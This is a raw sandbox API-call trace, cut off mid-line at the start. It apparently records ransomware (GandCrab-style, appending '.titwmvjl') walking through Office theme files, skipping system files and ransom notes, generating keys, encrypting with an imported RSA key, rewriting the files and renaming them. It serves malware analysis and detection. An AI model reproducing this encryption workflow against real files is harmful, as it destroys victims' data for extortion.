(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0074.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="desktop.ini") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="autorun.inf") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntuser.dat") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="iconcache.db") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="bootsect.bak") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="boot.ini") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntuser.dat.log") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="thumbs.db") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntldr") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="NTDETECT.COM") returned 1 [0074.167] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="Bootfont.bin") returned 1 [0074.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0074.167] lstrlenW (lpString=".thmx") returned 5 [0074.167] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.167] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0074.167] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.168] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.168] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0074.169] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.169] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0074.170] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.170] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.170] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.170] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.171] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.171] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0074.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.171] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.171] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.171] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.171] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.172] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.172] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0074.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.172] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.172] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.172] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.173] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5031f8) returned 1 [0074.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.173] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.173] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.173] GetLastError () returned 0x0 [0074.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.174] CryptDestroyKey (hKey=0x5031f8) returned 1 [0074.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.174] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.174] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.175] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0074.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.175] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.175] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.175] GetLastError () returned 0x0 [0074.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.176] CryptDestroyKey (hKey=0x503738) returned 1 [0074.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.176] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.176] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0074.176] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0074.176] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x883d3, lpOverlapped=0x0) returned 1 [0074.219] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff77c2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.219] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x883d3, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x883d3, lpOverlapped=0x0) returned 1 [0074.226] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.226] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.227] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.231] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.233] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.233] CloseHandle (hObject=0x2ec) returned 1 [0074.240] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0074.241] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.242] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0074.242] lstrcmpW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2=".") returned 1 [0074.242] lstrcmpW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="..") returned 1 [0074.242] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457464[[fn=Dividend]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" [0074.242] lstrlenW (lpString=".titwmvjl") returned 9 [0074.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0074.242] VirtualAlloc (lpAddress=0x0, dwSize=0x148, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0074.242] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx.titwmvjl") returned 141 [0074.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0074.242] lstrlenW (lpString=".thmx") returned 5 [0074.242] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.242] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0074.242] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0074.243] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0074.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="desktop.ini") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="autorun.inf") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntuser.dat") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="iconcache.db") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="bootsect.bak") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="boot.ini") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntuser.dat.log") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="thumbs.db") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntldr") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="NTDETECT.COM") returned 1 [0074.243] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="Bootfont.bin") returned 1 [0074.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0074.243] lstrlenW (lpString=".thmx") returned 5 [0074.243] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.243] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0074.243] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.244] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.244] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0074.244] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.244] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0074.255] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.255] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.256] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.256] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.256] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.256] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0074.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.256] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.256] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.257] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.257] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.257] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.257] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.257] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0074.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.258] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.258] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.258] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.258] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0074.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.259] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.259] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.259] GetLastError () returned 0x0 [0074.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.259] CryptDestroyKey (hKey=0x503938) returned 1 [0074.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.259] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.260] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.260] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.260] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0074.260] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.260] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.260] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.260] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.261] GetLastError () returned 0x0 [0074.261] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.261] CryptDestroyKey (hKey=0x503738) returned 1 [0074.261] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.261] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.261] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0074.261] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0074.261] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x8b615, lpOverlapped=0x0) returned 1 [0074.284] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff749eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.291] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x8b615, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x8b615, lpOverlapped=0x0) returned 1 [0074.304] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.305] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.307] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.311] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.314] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.315] CloseHandle (hObject=0x2ec) returned 1 [0074.324] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0074.325] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.325] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0074.325] lstrcmpW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2=".") returned 1 [0074.325] lstrcmpW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="..") returned 1 [0074.325] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457475[[fn=Frame]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" [0074.325] lstrlenW (lpString=".titwmvjl") returned 9 [0074.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0074.325] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0074.326] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx.titwmvjl") returned 138 [0074.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0074.326] lstrlenW (lpString=".thmx") returned 5 [0074.326] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.326] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0074.326] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0074.326] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 